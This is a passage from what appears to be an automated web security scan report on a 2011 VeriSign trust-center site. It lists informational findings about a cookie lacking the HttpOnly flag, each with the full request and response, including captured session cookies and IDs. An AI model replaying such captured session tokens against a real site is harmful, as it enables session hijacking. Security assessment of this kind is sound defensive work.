Accept-Ranges: bytes
Content-Length: 978
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif

...[SNIP]...

10.90. https://trust-center.verisign.com/rcm/verisign/images/tsTermWtT.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/images/tsTermWtT.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/images/tsTermWtT.gif HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:39 GMT
Server: Apache
Set-Cookie: TLTHID=677CD43CDB2A10DB4CF39F6CAED9DACC; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:06 GMT
Accept-Ranges: bytes
Content-Length: 997
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif

...[SNIP]...

10.91. https://trust-center.verisign.com/rcm/verisign/images/tsTermWtT.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/images/tsTermWtT.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/images/tsTermWtT.jpg HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:39 GMT
Server: Apache
Set-Cookie: TLTHID=677EAADCDB2A10DB6A7FCEC4D1E75D2A; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:07 GMT
Accept-Ranges: bytes
Content-Length: 876
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/jpeg

...[SNIP]...

10.92. https://trust-center.verisign.com/rcm/verisign/images/webtrust.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/images/webtrust.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/images/webtrust.gif HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:40 GMT
Server: Apache
Set-Cookie: TLTHID=685CA56CDB2A10DB44B7B1847A7DDBAF; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:06 GMT
Accept-Ranges: bytes
Content-Length: 2221
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif

...[SNIP]...

10.93. https://trust-center.verisign.com/rcm/verisign/scripts/account_signin.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/scripts/account_signin.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/scripts/account_signin.js HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:34 GMT
Server: Apache
Set-Cookie: TLTHID=64AF4CEEDB2A10DB44ABB1847A7DDBAF; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 741
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript


function lost_password(formName,referrerPath,username){var form=document.forms[formName];var usernameObj=getElement(username);form.action="/process/retail/account_lost_password?username="+escape(user
...[SNIP]...

10.94. https://trust-center.verisign.com/rcm/verisign/scripts/chat_support.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/scripts/chat_support.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: TLTHID. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/scripts/chat_support.js HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:37 GMT
Server: Apache
Set-Cookie: TLTHID=66684BA8DB2A10DB4CF19F6CAED9DACC; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 423
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript


function agents_available(onclickLink,imgLink){var sb=document.getElementById('smartbutton');if(sb){sb.innerHTML='<A HREF="" onClick="window.open(\''+onclickLink+'\',\'custclient\',\'width=500,height
...[SNIP]...

10.95. https://trust-center.verisign.com/rcm/verisign/scripts/default.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/scripts/default.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: TLTHID. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/scripts/default.js HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:34 GMT
Server: Apache
Set-Cookie: TLTHID=649170C0DB2A10DB4CEA9F6CAED9DACC; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 2794
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript


function initGoogleAnalytics(){_uacct="UA-230424-1";urchinTracker();}
function clearButtonSubmits(){if(document.forms){for(var i=0,l=document.forms.length;i<l;i++){if(document.forms[i].button_back){d
...[SNIP]...

10.96. https://trust-center.verisign.com/rcm/verisign/scripts/oo_conf_en-US_inline.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/scripts/oo_conf_en-US_inline.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: TLTHID. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/scripts/oo_conf_en-US_inline.js HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:36 GMT
Server: Apache
Set-Cookie: TLTHID=659B664CDB2A10DB44AFB1847A7DDBAF; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 1674
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript

/* OnlineOpinion v4.1.7 */
/* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. 6606581, 6421724, 6785717 B1 and other patents pending. */

/* Create new OnlineOpini
...[SNIP]...

10.97. https://trust-center.verisign.com/rcm/verisign/scripts/oo_engine_c.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/scripts/oo_engine_c.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: TLTHID. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/scripts/oo_engine_c.js HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:35 GMT
Server: Apache
Set-Cookie: TLTHID=65897DECDB2A10DB4CEE9F6CAED9DACC; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 28368
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript

/* OnlineOpinion v4.1.7 */
/* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. 6606581, 6421724, 6785717 B1 and other patents pending. */
var OnlineOpinion=new Ob
...[SNIP]...

10.98. https://trust-center.verisign.com/rcm/verisign/scripts/popup.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/scripts/popup.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: TLTHID. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/scripts/popup.js HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:37 GMT
Server: Apache
Set-Cookie: TLTHID=667DD996DB2A10DB6A7CCEC4D1E75D2A; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 598
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript


var currentPopupId=null;function hidePopup(){if(currentPopupId){hideElement(currentPopupId);currentPopupId=null;showElementBlock("right_content");showElementBlock("right_content_1");showElementBlock(
...[SNIP]...

10.99. https://trust-center.verisign.com/rcm/verisign/scripts/product_white_list.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/scripts/product_white_list.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: TLTHID. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/scripts/product_white_list.js HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:35 GMT
Server: Apache
Set-Cookie: TLTHID=657CE672DB2A10DB4CED9F6CAED9DACC; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 1005
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript


var product_white_list=["SS001","SS002","SS0Y3","SS003","GS001","GS002","GS0Y3","HA001","HA002","HA0Y3","GHA001","GHA002","GHA0Y3","ABSST000"];function white_list_product(product){for(var i=0;i<produ
...[SNIP]...

10.100. https://trust-center.verisign.com/rcm/verisign/scripts/quick_signin.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/scripts/quick_signin.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: TLTHID. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/scripts/quick_signin.js HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:34 GMT
Server: Apache
Set-Cookie: TLTHID=64A2C5DCDB2A10DB6A76CEC4D1E75D2A; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 5155
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript


var http_request=false;var targetAjaxDiv="unspecified";function callbackFunction(){if(http_request.readyState==4){if(http_request.status==200){var result=http_request.responseText;try{document.getEle
...[SNIP]...

10.101. https://trust-center.verisign.com/rcm/verisign/scripts/script_log.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/scripts/script_log.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: TLTHID. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/scripts/script_log.js HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:34 GMT
Server: Apache
Set-Cookie: TLTHID=64914668DB2A10DB44AAB1847A7DDBAF; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 1408
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript


var log;function getLogLevel(){if(document.getElementById("script_log")===null){return"none";}else{return document.getElementById("script_log").value;}}
function generateCall(level,message){var url='
...[SNIP]...

10.102. https://trust-center.verisign.com/rcm/verisign/scripts/src/dojo/dojo/dojo.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/scripts/src/dojo/dojo/dojo.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: TLTHID. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/scripts/src/dojo/dojo/dojo.js HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
